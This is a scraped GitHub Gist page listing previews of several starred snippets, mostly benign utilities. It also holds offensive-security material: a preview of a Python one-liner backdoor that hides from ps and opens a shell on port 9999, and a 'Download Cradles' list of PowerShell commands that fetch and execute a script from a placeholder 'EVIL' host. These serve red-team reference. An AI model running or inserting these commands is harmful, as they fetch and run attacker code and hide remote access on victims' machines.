Skip to content

Instantly share code, notes, and snippets.

View dismantl's full-sized avatar
💣
hacking

Dan Staples dismantl

💣
hacking
263 followers · 36 following
View GitHub Profile
@lrvick
lrvick / github-troll.md
Last active May 3, 2024 16:20
Trolling Github's DMCA repo with their own security flaws.
@davidmreed
davidmreed / simple-salesforce-jwt.py
Created January 15, 2019 01:32
Using simple_salesforce with JWT authentication
import jwt
import requests
import datetime
from simple_salesforce import Salesforce
from simple_salesforce.exceptions import SalesforceAuthenticationFailed
def jwt_login(consumer_id, username, private_key, sandbox=False):
endpoint = 'https://test.salesforce.com' if sandbox is True else 'https://login.salesforce.com'
jwt_payload = jwt.encode(
{
@taviso
taviso / delete-twitter-dm.js
Created November 3, 2017 16:33
Automate deleting twitter direct messages.
// Open direct messages window, paste this into console.
function deleteNextConversation()
{
if (!(dm = document.getElementsByClassName("DMInbox-conversationItem")[0])) {
clearInterval(tmr)
return;
}
dm.firstChild.click();
setTimeout('document.getElementsByClassName("js-actionDeleteConversation")[0].click()', 1000);
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active May 8, 2024 12:58
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@epinna
epinna / pypest.py
Last active September 4, 2023 02:13
Hackish one-liner memory-only backdoor agent which hides from ps
#!/usr/bin/env python
# This script prints a simple one-liner memory-only backdoor agent which hides from ps.
# It renames itself within the process list using a really hackish (AND POTENTIALLY DANGEROUS) /proc/self/mem rewrite
# and spawns a shell on port 9999. Just an experiment, there are simplest way to run unnoticed in the
# process list (see the technique used by EmPyre: https://github.com/adaptivethreat/EmPyre)
template = """
import sys,re,pty,os,socket
@jalsot
jalsot / qemu-debian-create-image
Last active October 27, 2020 03:24 — forked from spectra/qemu-debian-create-image
Debian qemu image creation using debootstrap (automated from http://diogogomes.com/2012/07/13/debootstrap-kvm-image/ by Kamil Trzcinski (http://ayufan.eu) with some modifications by me)
#!/bin/bash
# Configs overwritable via environment variables
VSYSTEM=${VSYSTEM:=qemu} # Either 'qemu' or 'kvm'
FLAVOUR=${FLAVOUR:=debian} # Either 'debian' or 'ubuntu'
INCLUDES=${INCLUDES:="less,vim,sudo,openssh-server,acpid"}
MIRROR=${MIRROR:="http://ftp.hu.debian.org/debian"}
#MIRROR=${MIRROR:="http://localhost:3142/debian"}
#MIRROR=${MIRROR:="http://hu.archive.ubuntu.com/ubuntu/"}
#MIRROR=${MIRROR:="http://localhost:3142/ubuntu"}
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active May 13, 2024 15:40
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object